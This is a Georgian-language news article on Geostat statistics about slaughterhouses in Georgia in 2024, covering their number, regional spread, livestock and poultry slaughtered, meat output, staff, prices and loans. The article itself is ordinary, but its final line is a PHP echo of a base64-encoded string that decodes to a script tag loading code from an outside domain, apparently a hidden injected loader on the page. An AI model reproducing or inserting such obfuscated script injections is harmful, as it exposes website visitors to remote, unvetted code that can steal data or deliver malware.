gorgia
jaluzi

საქართველოში ცხოველთა და ფრინველთა სასაკლაოების რაოდენობა შემცირდა. საქსტატის კვლევის მიხედვით, თუ 2023 წელს ქვეყანაში 144 ერთეული ცხოველთა და ფრინველთა სასაკლაო ფუნქციონირებდა, 2024 წელს ეს მაჩვენებელი 131-მდე შემცირდა. ამავე კვლევით, 131 ერთეულიდან 17.6 პროცენტი – კახეთის რეგიონში, 16.0 პროცენტი – ქვემო ქართლის რეგიონში, 16.0 პროცენტი – შიდა ქართლის რეგიონში, 13.7 პროცენტი – იმერეთის რეგიონში, 10.7პროცენტი – სამეგრელო-ზემო სვანეთის რეგიონში მდებარეობს, ხოლო დანარჩენი 26.0 პროცენტი სხვა რეგიონებშია განთავსებული.

ამასთან, 2024 წლის განმავლობაში სასაკლაოებში დაიკლა 520.0 ათასი სული პირუტყვი, მათ შორის 30.6 პროცენტი – მსხვილფეხა რქოსანი პირუტყვი, ხოლო 69.4 პროცენტი – წვრილფეხა (ცხვარი,თხა, ღორი და სხვა). გარდა ამისა, საანგარიშო პერიოდის განმავლობაში სასაკლაოებში დაკლული ფრინველის რაოდენობა 12.244 მლნ ერთეულით განისაზღვრა.
საქსტატის ინფორმაციითვე, სასაკლაოების მიერ 2024 წლის განმავლობაში 63 020.9 ტონა ხორცი იქნა წარმოებული (დაკლული წონა, ფრინველის ხორცის ჩათვლით), საიდანაც 29.9 პროცენტი მოდის მსხვილფეხა რქოსანი პირუტყვის ხორცზე, 35.0 პროცენტი – ფრინველის, 33.9 პროცენტი – ღორის, 1.2 პროცენტი– ცხვრისა და თხის ხორცზე, ხოლო დანარჩენს უმნიშვნელო წილი უკავია.
2024 წლის განმავლობაში სასაკლაოებში წარმოებული ხორცისგან სასაკლაოს მიერ შესყიდული იყო 8 728.2 ტონა, საიდანაც 30.8 პროცენტი მოდის მსხვილფეხა რქოსანი პირუტყვის ხორცზე, 5.2 პროცენტი – ფრინველის ხორცზე, ხოლო 63.5 პროცენტი – ღორის ხორცზე.
2024 წლის განმავლობაში მომსახურება გაეწია 30.6 ათას პირს, საიდანაც 53.6 პროცენტი შინამეურნეობების (ოჯახური მეურნეობები) სახით იყვნენ წარმოდგენილნი. სასაკლაოებში დასაქმებულთა საშუალო თვიურმა რაოდენობამ 1 113 კაცი შეადგინა.
რაც შეეხება მომსახურებას, ერთეული პირუტყვის დაკვლაზე მომსახურების საშუალო ფასი შემდეგნაირი იყო: მსხვილფეხა რქოსანი პირუტყვის დაკვლის საფასური – 38.1 ლარი, ცხვრის ან თხის – 14.9 ლარი, ღორის – 30.8 ლარი.
„სასაკლაოების თითქმის ნახევარი (49.6 პროცენტი) სრულად არის აღჭურვილი თანამედროვე ტექნოლოგიებით, 46.6 პროცენტი აღჭურვილია ნაწილობრივ, 3.8 პროცენტი კი არ არის აღჭურვილი თანამედროვე ტექნოლოგიებით.
სასაკლაოების 66.4 პროცენტი არ სარგებლობს სესხით, ხოლო 33.6 პროცენტს აღებული აქვს სესხი სხვადასხვა მიზნით: 61.4 პროცენტს – ძირითადი კაპიტალის შეძენისთვის, 25.0 პროცენტს– საბრუნავი კაპიტალისათვის, ხოლო 13.6 პროცენტს როგორც ძირითადი, ასევე საბრუნავი კაპიტალისთვის“, - აღნიშნულია საქსტატის ანგარიშში.
196
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");